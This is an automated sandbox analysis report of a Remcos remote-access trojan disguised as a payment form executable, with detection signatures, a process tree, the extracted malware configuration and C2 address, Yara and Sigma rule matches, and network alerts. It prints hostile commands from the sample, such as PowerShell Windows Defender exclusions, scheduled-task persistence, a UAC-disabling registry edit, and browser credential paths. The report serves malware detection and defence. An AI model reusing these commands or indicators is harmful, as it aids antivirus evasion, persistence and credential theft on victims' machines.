Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Payment Transfer Request Form.bat.exe

Overview

General Information

Sample name:Payment Transfer Request Form.bat.exe
Analysis ID:1561752
MD5:fc5a80adf45d78ffa834283d0a78f9f6
SHA1:6865dec6f71546ea01420295b7175038c3a81ec4
SHA256:e588a098e9ceb33f2616e11a3faf28162e5f4b7f3800b22ab3023bc376aeb18c
Tags:batexeuser-abuse_ch
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Remcos RAT
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Payment Transfer Request Form.bat.exe (PID: 4072 cmdline: "C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe" MD5: FC5A80ADF45D78FFA834283D0A78F9F6)
    • powershell.exe (PID: 7144 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5360 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\iKgKaogJ.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7192 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmp854C.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Payment Transfer Request Form.bat.exe (PID: 7380 cmdline: "C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe" MD5: FC5A80ADF45D78FFA834283D0A78F9F6)
      • wscript.exe (PID: 7480 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
        • cmd.exe (PID: 7644 cmdline: "C:\Windows\System32\cmd.exe" /c "C:\ProgramData\AppUpdate\remcos.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • remcos.exe (PID: 7704 cmdline: C:\ProgramData\AppUpdate\remcos.exe MD5: FC5A80ADF45D78FFA834283D0A78F9F6)
            • powershell.exe (PID: 7852 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData\AppUpdate\remcos.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
              • conhost.exe (PID: 7864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 7872 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\iKgKaogJ.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
              • conhost.exe (PID: 7892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • schtasks.exe (PID: 7920 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmpAC9A.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
              • conhost.exe (PID: 7936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • remcos.exe (PID: 8156 cmdline: "C:\ProgramData\AppUpdate\remcos.exe" MD5: FC5A80ADF45D78FFA834283D0A78F9F6)
  • iKgKaogJ.exe (PID: 7508 cmdline: C:\Users\user\AppData\Roaming\iKgKaogJ.exe MD5: FC5A80ADF45D78FFA834283D0A78F9F6)
  • remcos.exe (PID: 916 cmdline: "C:\ProgramData\AppUpdate\remcos.exe" MD5: FC5A80ADF45D78FFA834283D0A78F9F6)
    • schtasks.exe (PID: 2052 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmpCD42.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 2320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • remcos.exe (PID: 2508 cmdline: "C:\ProgramData\AppUpdate\remcos.exe" MD5: FC5A80ADF45D78FFA834283D0A78F9F6)
  • remcos.exe (PID: 2624 cmdline: "C:\ProgramData\AppUpdate\remcos.exe" MD5: FC5A80ADF45D78FFA834283D0A78F9F6)
    • schtasks.exe (PID: 7452 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmpED6C.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • remcos.exe (PID: 3248 cmdline: "C:\ProgramData\AppUpdate\remcos.exe" MD5: FC5A80ADF45D78FFA834283D0A78F9F6)
  • remcos.exe (PID: 3968 cmdline: "C:\ProgramData\AppUpdate\remcos.exe" MD5: FC5A80ADF45D78FFA834283D0A78F9F6)
    • schtasks.exe (PID: 7172 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmpCDB.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • remcos.exe (PID: 7388 cmdline: "C:\ProgramData\AppUpdate\remcos.exe" MD5: FC5A80ADF45D78FFA834283D0A78F9F6)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["149.226:9285:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "AppUpdate", "Hide file": "Disable", "Mutex": "Rmc-VCJ8ZS", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "AppUpdate", "Keylog folder": "remcos", "Keylog file max size": "100"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000024.00000002.1736773927.0000000000BEA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000020.00000002.1656887776.0000000000D4A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000017.00000002.3782308386.00000000014FA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
          • 0x691e0:$a1: Remcos restarted by watchdog!
          • 0x69738:$a3: %02i:%02i:%02i:%03i
          • 0x69abd:$a4: * Remcos v
          Click to see the 17 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          9.2.Payment Transfer Request Form.bat.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
            9.2.Payment Transfer Request Form.bat.exe.400000.0.unpackWindows_Trojan_Remcos_b296e965unknownunknown
            • 0x679e0:$a1: Remcos restarted by watchdog!
            • 0x67f38:$a3: %02i:%02i:%02i:%03i
            • 0x682bd:$a4: * Remcos v
            9.2.Payment Transfer Request Form.bat.exe.400000.0.unpackREMCOS_RAT_variantsunknownunknown
            • 0x629e4:$str_a1: C:\Windows\System32\cmd.exe
            • 0x62960:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
            • 0x62960:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
            • 0x61e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
            • 0x62648:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
            • 0x61a0c:$str_b2: Executing file:
            • 0x62b28:$str_b3: GetDirectListeningPort
            • 0x62408:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
            • 0x62630:$str_b7: \update.vbs
            • 0x61a34:$str_b9: Downloaded file:
            • 0x61a20:$str_b10: Downloading file:
            • 0x61ac4:$str_b12: Failed to upload file:
            • 0x62af0:$str_b13: StartForward
            • 0x62b10:$str_b14: StopForward
            • 0x625d8:$str_b15: fso.DeleteFile "
            • 0x6256c:$str_b16: On Error Resume Next
            • 0x62608:$str_b17: fso.DeleteFolder "
            • 0x61ab4:$str_b18: Uploaded file:
            • 0x61a74:$str_b19: Unable to delete:
            • 0x625a0:$str_b20: while fso.FileExists("
            • 0x61f49:$str_c0: [Firefox StoredLogins not found]
            9.2.Payment Transfer Request Form.bat.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewerdetects Windows exceutables potentially bypassing UAC using eventvwr.exeditekSHen
            • 0x61900:$s1: \Classes\mscfile\shell\open\command
            • 0x61960:$s1: \Classes\mscfile\shell\open\command
            • 0x61948:$s2: eventvwr.exe
            0.2.Payment Transfer Request Form.bat.exe.42d99c0.2.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
              Click to see the 18 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe", ParentImage: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe, ParentProcessId: 4072, ParentProcessName: Payment Transfer Request Form.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe", ProcessId: 7144, ProcessName: powershell.exe
              Sigma detected: Script Interpreter Execution From Suspicious Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe", ParentImage: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe, ParentProcessId: 7380, ParentProcessName: Payment Transfer Request Form.bat.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" , ProcessId: 7480, ProcessName: wscript.exe
              Sigma detected: Suspicious Script Execution From Temp Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe", ParentImage: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe, ParentProcessId: 7380, ParentProcessName: Payment Transfer Request Form.bat.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" , ProcessId: 7480, ProcessName: wscript.exe
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe", ParentImage: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe, ParentProcessId: 7380, ParentProcessName: Payment Transfer Request Form.bat.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" , ProcessId: 7480, ProcessName: wscript.exe
              Sigma detected: CurrentVersion Autorun Keys Modification
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\ProgramData\AppUpdate\remcos.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe, ProcessId: 7380, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AppUpdate
              Sigma detected: Powershell Defender Exclusion
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe", ParentImage: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe, ParentProcessId: 4072, ParentProcessName: Payment Transfer Request Form.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe", ProcessId: 7144, ProcessName: powershell.exe
              Sigma detected: Suspicious Schtasks From Env Var Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmp854C.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmp854C.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe", ParentImage: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe, ParentProcessId: 4072, ParentProcessName: Payment Transfer Request Form.bat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmp854C.tmp", ProcessId: 7192, ProcessName: schtasks.exe
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe", ParentImage: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe, ParentProcessId: 7380, ParentProcessName: Payment Transfer Request Form.bat.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" , ProcessId: 7480, ProcessName: wscript.exe
              Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\ProgramData\AppUpdate\remcos.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe, ProcessId: 7380, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\AppUpdate
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe", ParentImage: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe, ParentProcessId: 4072, ParentProcessName: Payment Transfer Request Form.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe", ProcessId: 7144, ProcessName: powershell.exe

              Persistence and Installation Behavior

              barindex
              Sigma detected: Scheduled temp file as task from temp location
              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmp854C.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmp854C.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe", ParentImage: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe, ParentProcessId: 4072, ParentProcessName: Payment Transfer Request Form.bat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmp854C.tmp", ProcessId: 7192, ProcessName: schtasks.exe

              Stealing of Sensitive Information

              barindex
              Sigma detected: Remcos
              Source: Registry Key setAuthor: Joe Security: Data: Details: BA 5D 66 75 0B AD 2D 6B C4 A5 90 E2 E7 01 DB 6C E2 AD 4B C4 DA 85 FA E6 DF 3D B8 A1 D3 66 D7 01 66 64 17 29 82 B1 62 BF 59 84 B0 29 83 C0 6D D4 AA 1C 73 5E B7 20 AA 95 2F A4 C2 BC E5 60 82 E1 1A 1A 8D 40 E2 68 DB 3F , EventID: 13, EventType: SetValue, Image: C:\ProgramData\AppUpdate\remcos.exe, ProcessId: 8156, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-VCJ8ZS\exepath

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-24T08:23:49.109682+010020365941Malware Command and Control Activity Detected192.168.2.949754212.162.149.2269285TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-24T08:23:52.905180+010028033043Unknown Traffic192.168.2.949761178.237.33.5080TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\install.vbsAvira: detection malicious, Label: VBS/Runner.VPD
              Found malware configuration
              Source: 00000024.00000002.1736773927.0000000000BEA000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["149.226:9285:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "AppUpdate", "Hide file": "Disable", "Mutex": "Rmc-VCJ8ZS", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "AppUpdate", "Keylog folder": "remcos", "Keylog file max size": "100"}
              Multi AV Scanner detection for dropped file
              Source: C:\ProgramData\AppUpdate\remcos.exeReversingLabs: Detection: 52%
              Source: C:\ProgramData\AppUpdate\remcos.exeVirustotal: Detection: 61%Perma Link
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeReversingLabs: Detection: 52%
              Multi AV Scanner detection for submitted file
              Source: Payment Transfer Request Form.bat.exeReversingLabs: Detection: 52%
              Source: Payment Transfer Request Form.bat.exeVirustotal: Detection: 61%Perma Link
              Yara detected Remcos RAT
              Source: Yara matchFile source: 9.2.Payment Transfer Request Form.bat.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Payment Transfer Request Form.bat.exe.42d99c0.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.Payment Transfer Request Form.bat.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Payment Transfer Request Form.bat.exe.434efe0.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Payment Transfer Request Form.bat.exe.434efe0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Payment Transfer Request Form.bat.exe.42d99c0.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000024.00000002.1736773927.0000000000BEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.1656887776.0000000000D4A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000017.00000002.3782308386.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.1407344012.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000002.1574639451.000000000117A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1417981546.00000000042D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Payment Transfer Request Form.bat.exe PID: 4072, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: Payment Transfer Request Form.bat.exe PID: 7380, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 8156, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 2508, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 3248, type: MEMORYSTR
